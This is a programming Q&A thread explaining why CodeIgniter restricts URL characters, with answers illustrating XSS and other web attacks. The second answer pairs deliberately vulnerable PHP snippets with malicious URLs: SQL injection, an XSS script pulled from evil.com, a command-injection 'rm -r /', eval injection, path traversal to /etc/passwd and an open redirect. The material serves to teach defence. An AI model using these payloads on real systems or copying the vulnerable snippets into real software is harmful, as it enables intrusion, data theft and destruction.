Home / Questions / 19994
Accepted
Juan Pinzón
Asked: 2020-08-10 05:57:13 +0800 CST 2020-08-10 05:57:13 +0800 CST

Why is it dangerous to allow all characters in a URL?

  • 772

Reviewing the configuration CodeIgniterI came across the following line:

$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-';

And the documentation for it says:

/*
|--------------------------------------------------------------------------
| Allowed URL Characters
|--------------------------------------------------------------------------
|
| This lets you specify which characters are permitted within your URLs.
| When someone tries to submit a URL with disallowed characters they will
| get a warning message.
|
| As a security measure you are STRONGLY encouraged to restrict URLs to
| as few characters as possible.  By default only these are allowed: a-z 0-9~%.:_-
|
| Leave blank to allow all characters -- but only if you are insane.
|
| The configured value is actually a regular expression character group
| and it will be executed as: ! preg_match('/^[<permitted_uri_chars>]+$/i
|
| DO NOT CHANGE THIS UNLESS YOU FULLY UNDERSTAND THE REPERCUSSIONS!!
|
*/

/*
|--------------------------------------------------------------------------
| Caracteres URL permitidos
|----------------------------------------------------------------------
|
|Esto permite especificar qué caracteres están permitidas dentro de sus URL. 
|Cuando alguien trata de enviar una URL con caracteres no permitidos se les 
|dará un mensaje de advertencia.
|
|Como medida de seguridad, se recomienda enfáticamente restringir las direcciones 
|URL a la menor cantidad de caracteres posible. 
|Por defecto sólo se permiten éstos: a-z ~ 0-9%:. _-
|
|Dejar en blanco para permitir todos los caracteres -- pero sólo si estás loco.
|
|El valor configurado es actualmente una expresión regular de agrupamiento 
|de caracteres y sera ejecutada como: ! preg_match('/^[<permitted_uri_chars>]+$/i
|
|NO CAMBIES ESTO HASTA QUE COMPRENDAS COMPLETAMENTE LAS REPERCUSIONES!!
|
*/

However, it is not entirely clear to me what repercussions or security problems may arise from allowing all characters in a url.

Regardless of the language used, what problems can this situation generate?

aplicación-web

2 Answers

  1. Best Answer

    It is to avoid security problems, such as Cross Site Scripting (XSS), in which a user could execute code within your page as if it were the page's own code.

    Theoretically, developers should be wary of all user input and sanitize it before accepting it and writing it to the page, but sadly, that's not always the case and leads to the aforementioned XSS problems.

    The string above allows letters, numbers, and the characters , ~, %, ., :, _, \, and -; what is an example of a white list: list the characters that are allowed and prohibit the others.

    I am going to give an example of why it is important to limit the characters in the URL. Imagine if characters like <or were allowed >and the programmer didn't sanitize the input and was passed this URL:

    http://www.mipagina.com/index.php?nombre=Alvaro<script>alert(1)</script>

    And the code would be like this without sanitizing the inputs:

    <h1>Hola <?php echo $_GET["nombre"]; ?>!</h1>

    Then the page will not only show the message "Hello Alvaro!", but it will also show an alert that will say "1" which is an unwanted effect.

    And now imagine that instead of being a simple alert, what I do is inject a piece of code that redirects all the links to my page, or copies the user information and sends it to me, or inserts my advertising... all without Neither the user nor the programmer realizes it because that code will be executed as the original of the page and will be trusted.

    • 15

  2. Looking for information about it, I found the following answer in the Information Security community: https://security.stackexchange.com .

    The following information is a translation of the answer to the question in the following link: https://security.stackexchange.com/questions/11234/how-does-hacking-work

    Hacks that work by changing the URL

    • A valid and a malicious example will be given
    • Some examples require URL encoding to work (this is usually done automatically by the browser)

    SQL injection

    Code:

    $username = $_POST['username'];
$pw = $_GET['password'];
mysql_query("SELECT * FROM userTable WHERE username = $username AND password = $pw");

    exploit (log in as administrator without knowing the password):

    example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
example.com/?username=Administrator&password=password' or 1=1--

    Cross Site Scripting (XSS)

    Code:

    $nickname= $_GET['nickname'];
echo "<div>Your nickname is $nickname</div>\n";

    exploit (register visiting user as zombie in BeEF ):

    example.com/?nickname=Karrax
example.com/?nickname=<script src="evil.com/beefmagic.js.php" />

    Command injection

    Code:

    <?php
echo shell_exec('cat '.$_GET['filename']);
?>

    exploit (attempts to delete all files in the root directory):

    example.com/?filename=readme.txt
example.com/?filename=readme.txt;rm -r /

    Code injection

    Code:

    <?php
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
?>

    exploit (injects the phpinfo() command which prints information valuable to the attacker on the screen):

    example.com/?arg=1
example.com/?arg=1; phpinfo()

    LDAP injection

    Code:

    <?php
$username = $_GET['username'];
$password = $_GET['password'];
ldap_query("(&(cn=$username)(password=$password)")
?>

    exploit (log in as administrator without knowing the password):

    example.com/?username=admin&password=adminadmin
example.com/?username=admin&password=*

    path traverse

    Code:

    <?php
include("./" . $_GET['page']);
?>

    exploit (gets /etc/passwd):

    example.com/?page=front.php
example.com/?page=../../../../../../../../etc/passwd

    Redirect/Forward attack

    Code:

    <?php
 $redirectUrl = $_GET['url'];
 header("Location: $redirectUrl");
 ?>

    exploit (Send user from your page to a malicious page):

    example.com/?url=example.com/faq.php
example.com/?url=evil.com/sploitCode.php

    Failure to Restrict URL Access

    Code:

    The lack of .htaccess ACL or similar access control. Allows the user to guess or by other means discover the location of content that should only be accessible while logged in.

    exploit:

    example.com/users/showUser.php
example.com/admins/editUser.php

    Buffer overflow (technically by accessing a URL, but implemented with metasploit)

    Code:

    A vulnerability in the web server code itself. Standard buffer overflow

    http://www.exploit-db.com/exploits/16798/
    • 8